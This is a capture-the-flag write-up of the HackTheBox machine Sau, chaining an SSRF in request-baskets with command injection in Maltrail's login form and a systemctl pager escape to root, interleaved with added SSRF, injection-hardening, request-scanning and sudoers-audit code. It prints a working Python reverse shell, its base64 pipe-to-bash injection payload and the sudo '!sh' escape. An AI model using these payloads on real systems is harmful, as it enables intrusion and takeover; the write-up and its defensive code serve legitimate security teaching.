HTB: Sau

Easy HTB machine with an SSRF vulnerability in request-baskets that gives access to an OS command injection in Maltrail.

Enumeration

Nmap port scan

Ports 22 and 55555 are open; ports 80 and 8338 are filtered.


DuxSec@hi$ nmap -sV -sS -p- -v -oN nmap_all_ports 10.10.11.224
Nmap scan report for 10.10.11.224
Host is up (0.032s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown

Port 80

Port 80 is not accessible.

Port 55555

It shows a website that is running request-baskets version 1.2.1.

./first_look.png

A quick Google search for "request-baskets 1.2.1 exploit" turns up a CVE for SSRF: https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3 . Details can be read here.

Creating the basket

./basket123.png

Basket created

./basket123_created.png

Basket dashboard

./basked123_dashboard.png

Shell as Puma

Settings

In the top bar I can open the settings.

./settings_button.png

That brings up the following configuration settings. Here the SSRF vulnerability can be abused by setting the forward URL to localhost (127.0.0.1) on port 80 (remember that the nmap scan showed port 80 as filtered, so it is only reachable from the host itself).

Make sure "Proxy Response" is ticked, otherwise the reply from the internal service is not returned to you.

./settings.png

This will make the requests that are sent to http://10.10.11.224:55555/basket123 be forwarded to the internal URL http://127.0.0.1:80.
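The root cause on the request-baskets side is that the forward URL is accepted without checking where it points. The following is an added example (written for this page, not request-baskets' own code) of the check a proxy setting like this needs: it resolves the host and refuses loopback, private, link-local and other non-routable destinations. The function names and the sample URLs are assumptions for the demo.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical validator for a user-supplied "forward URL" setting such as the
# one request-baskets exposes. Added example, not the project's code.
ALLOWED_SCHEMES = {"http", "https"}


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses (v4 or v6)."""
    addr = ipaddress.ip_address(ip)
    return not (
        addr.is_private         # 10/8, 172.16/12, 192.168/16, fc00::/7, ...
        or addr.is_loopback     # 127/8, ::1  (the target used in this writeup)
        or addr.is_link_local   # 169.254/16 (cloud metadata), fe80::/10
        or addr.is_multicast
        or addr.is_reserved
        or addr.is_unspecified  # 0.0.0.0, ::
    )


def resolve_host(host: str) -> list[str]:
    """Every address the host maps to. IP literals map to themselves; a name
    that fails to resolve yields [] so the caller fails closed."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        pass  # not a literal, fall through to DNS
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def validate_forward_url(url: str) -> tuple[bool, str]:
    """Return (accepted, reason) for a proposed forward URL."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # lower-cased, IPv6 brackets already stripped
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in forward URL not allowed"
    addresses = resolve_host(host)
    if not addresses:
        return False, f"cannot resolve {host!r}"
    for ip in addresses:
        if not is_public_address(ip):
            return False, f"{host!r} resolves to non-public address {ip}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed candidates: the first three are what an SSRF attempt looks like.
    for candidate in ("http://127.0.0.1:80/", "http://[::1]:8338/login",
                      "http://169.254.169.254/latest/", "http://93.184.216.34/"):
        print(candidate, validate_forward_url(candidate))
```

Validating once at save time is not enough on its own: a hostname can be re-pointed at 127.0.0.1 after the check (DNS rebinding), and a public target can redirect to an internal one. The proxy should connect to the address it validated and re-run the check on every redirect.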

Maltrail

Browsing to http://10.10.11.224:55555/basket123 shows the following page.

./mailtrail_initial.png

At the bottom of the page it shows that it is powered by Maltrail v0.53.

./mailtrail_powered.png

OS Command injection

Googling "maltrail v0.53 exploit" turns up the following page, which explains the OS command injection vulnerability in Maltrail v0.53:
https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/ .

POC from huntr.dev

curl 'http://hostname:8338/login' \
  --data 'username=;`id > /tmp/bbq`'

This shows that whatever is placed after the username parameter is executed as a shell command by the server.
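The bug class behind that POC is untrusted input being interpolated into a shell command string, where backticks are expanded even inside double quotes. The snippet below is an added, illustrative pair written for this page (not Maltrail's code): a failed-login logger done the vulnerable way, and the same message with the username passed as a shell argument instead of being pasted into the command. The injected "command" is a harmless echo so the demo is safe to run locally; function names and the message text are assumptions.

```python
import subprocess

# Added illustration of the injection pattern, not Maltrail's own code.
# Both variants run through /bin/sh so the difference in how the untrusted
# username reaches the shell is the only thing that changes.


def log_attempt_vulnerable(username: str) -> str:
    """Untrusted input spliced into the command text. The shell still expands
    `...` and $(...) inside double quotes, so a username containing backticks
    runs whatever they enclose."""
    cmd = f'printf "Failed login for user %s\\n" "{username}"'
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def log_attempt_hardened(username: str) -> str:
    """Same message, but the shell script is a fixed string and the untrusted
    value arrives as positional parameter $1. The shell never parses it as
    code, so backticks are printed literally."""
    script = 'printf "Failed login for user %s\\n" "$1"'
    out = subprocess.run(["sh", "-c", script, "login-logger", username],
                         capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    # Constructed payload in the shape the huntr POC uses, with a harmless body.
    payload = ";`echo INJECTED`"
    print("vulnerable:", log_attempt_vulnerable(payload).rstrip())
    print("hardened:  ", log_attempt_hardened(payload).rstrip())
```

The better fix is to not shell out at all (log with the language's logging facility); when a shell really is needed, data must travel as arguments, never as part of the script text.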

First I need to change the forward URL in the settings so that it ends in /login.

./settings_login.png

Let’s try to get a reverse shell.

Crafting payload

Using the PayloadsAllTheThings Python reverse shell:

python3 -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.196",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'

I will base64 encode this payload so it can be transferred correctly.


DuxSec@hi$ cat reverse_shell.py | base64 -w 0          
cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=

-w 0 disables line wrapping, so the output is a single line.

In order to execute this on the system, it needs to be decoded from base64 and piped into bash.

echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=|base64 -d|bash

Now I need to insert that into the curl payload, in place of the id command from the POC.


DuxSec@hi$ curl 'http://10.10.11.224:55555/basket123' --data 'username=;`echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=|base64 -d|bash`'

I start my nc listener, run the curl command, and receive a shell as puma.


DuxSec@hi$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.196] from (UNKNOWN) [10.10.11.224] 50712
/bin/sh: 0: can't access tty; job control turned off
$ whoami
puma
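From the defender's side, the request that delivered the shell above is easy to recognise: a login POST whose username field carries shell metacharacters and a base64 blob that is decoded and piped into a shell. The script below is an added detection example written for this page (not part of the writeup or of Maltrail) that runs those checks over captured request bodies, such as the ones request-baskets itself stores or a WAF logs. The sample requests are constructed here; the base64 blob is built in the script rather than copied from the machine.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed sample of captured POST bodies; not real captures from the box.
_BLOB = base64.b64encode(b"python3 -c 'import socket,subprocess'").decode()
SAMPLE_REQUESTS = [
    ("POST", "/login", "username=alice&password=hunter2"),
    ("POST", "/login", "username=;`id > /tmp/bbq`"),
    ("POST", "/login", f"username=;`echo {_BLOB}|base64 -d|bash`"),
    ("GET", "/", ""),
]

SHELL_META = re.compile(r"`|\$\(|\$\{|;|\|\|?|&&")
PIPE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\b.*?\|\s*(?:ba)?sh\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Strings that, once a blob is decoded, point at a spawned shell or socket.
DECODED_HINTS = ("socket", "subprocess", "/bin/sh", "/bin/bash", "bash -i", "python", "nc ")


def parse_form(body: str) -> list[tuple[str, str]]:
    """Split a form body into (name, value) pairs. Plain unquote is used on
    purpose: raw curl --data bodies are not plus-encoded, and turning '+'
    into a space would corrupt base64 before it is inspected."""
    pairs = []
    for part in body.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote(name), unquote(value)))
    return pairs


def decoded_hints(value: str) -> list[str]:
    """Decode every base64-looking run in value and report suspicious words."""
    hits = []
    for blob in B64_BLOB.findall(value):
        try:
            text = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
        hits.extend(h for h in DECODED_HINTS if h in text)
    return hits


def analyse_body(body: str) -> list[str]:
    findings = []
    for name, value in parse_form(body):
        if SHELL_META.search(value):
            findings.append(f"{name}: shell metacharacters")
        if PIPE_TO_SHELL.search(value):
            findings.append(f"{name}: base64 decode piped to a shell")
        for hint in decoded_hints(value):
            findings.append(f"{name}: embedded base64 decodes to text containing {hint!r}")
    return findings


def scan_requests(requests):
    """Return (index, method, path, findings) for every request that trips a rule."""
    out = []
    for i, (method, path, body) in enumerate(requests):
        findings = analyse_body(body)
        if findings:
            out.append((i, method, path, findings))
    return out


if __name__ == "__main__":
    for idx, method, path, findings in scan_requests(SAMPLE_REQUESTS):
        print(f"#{idx} {method} {path}")
        for f in findings:
            print("   ", f)
```

The metacharacter rule alone is noisy on fields where such characters are legitimate (passwords, free text), which is why the base64-decode and pipe-to-shell rules are kept separate: a hit on those is a much stronger signal and worth paging on.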

User flag


$ cd ~
$ ls
linpeas.sh
user.txt
$ cat user.txt
6277461a7719f********

Privilege escalation

Running sudo -l shows that the current user is allowed to run /usr/bin/systemctl status trail.service with sudo, without a password.


$ sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

A quick GTFOBins search shows how I can escalate my privileges: GTFOBins systemctl.

For the privilege escalation an interactive shell is required; if you don't know how to do this, read this: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
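The weakness in that sudo rule is that systemctl status hands the terminal to a pager, and the pager has a shell escape. The script below is an added example written for this page (not from the writeup) that audits sudoers rules for commands which can drop into a pager, treating --no-pager as the mitigation. The sudoers excerpt is constructed: the puma rule mirrors the sudo -l output above, the other users and services are made up to exercise the checks.

```python
import re
import shlex

# Constructed sudoers excerpt for the demo; only the puma line comes from the page.
SAMPLE_SUDOERS = """
Defaults env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
puma    ALL=(ALL:ALL) NOPASSWD: /usr/bin/systemctl status trail.service
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl --no-pager status app.service, /usr/bin/systemctl restart app.service
ops     ALL=(ALL) /usr/bin/journalctl -u app.service
backup  ALL=(ALL) NOPASSWD: /usr/bin/rsync -a /srv/ /backup/
"""

# Binaries that hand the terminal to a pager (which offers !sh) on some or all
# invocations. None means every invocation pages; a set lists the subcommands.
PAGER_SUBCOMMANDS = {
    "systemctl": {"status", "list-units", "list-timers", "show", "cat"},
    "journalctl": None,
    "less": None,
    "more": None,
    "man": None,
}

# user  host=(runas) TAG: cmd, cmd ...
SPEC_LINE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text: str) -> list[dict]:
    """Flatten user specification lines into one record per command."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC_LINE.match(line)
        if not m:
            continue
        tags = m.group("tags").replace(":", " ").split()
        for cmd in m.group("cmds").split(","):
            rules.append({"user": m.group("user"), "runas": m.group("runas") or "root",
                          "tags": tags, "cmd": cmd.strip()})
    return rules


def pager_risk(cmd: str):
    """Reason string if the command can drop into a pager (or is unrestricted), else None."""
    if cmd == "ALL":
        return "unrestricted command set"
    argv = shlex.split(cmd)
    binary = argv[0].rsplit("/", 1)[-1]
    if binary not in PAGER_SUBCOMMANDS:
        return None
    if "--no-pager" in argv[1:]:
        return None
    subs = PAGER_SUBCOMMANDS[binary]
    if subs is None or any(arg in subs for arg in argv[1:]):
        return f"{binary} invokes a pager"
    return None


def audit(text: str) -> list[tuple[str, str, str]]:
    return [(r["user"], r["cmd"], reason)
            for r in parse_sudoers(text) if (reason := pager_risk(r["cmd"]))]


if __name__ == "__main__":
    for user, cmd, reason in audit(SAMPLE_SUDOERS):
        print(f"{user:8} {reason:28} {cmd}")
```

For the rule on this machine the fix is to grant /usr/bin/systemctl status --no-pager trail.service (sudo matches arguments exactly, so the user cannot add the flag themselves), or to wrap the call in a script that the rule points at. Relying on env_reset does not help here: the pager is chosen by systemctl, not by the caller's environment.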

Root flag

Running sudo systemctl status trail.service and then typing !sh at the (press RETURN) pager prompt gives me a root shell.


puma@sau:/opt/maltrail$ sudo systemctl status trail.service
sudo systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)!sh
!sshh!sh
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
f3f250***********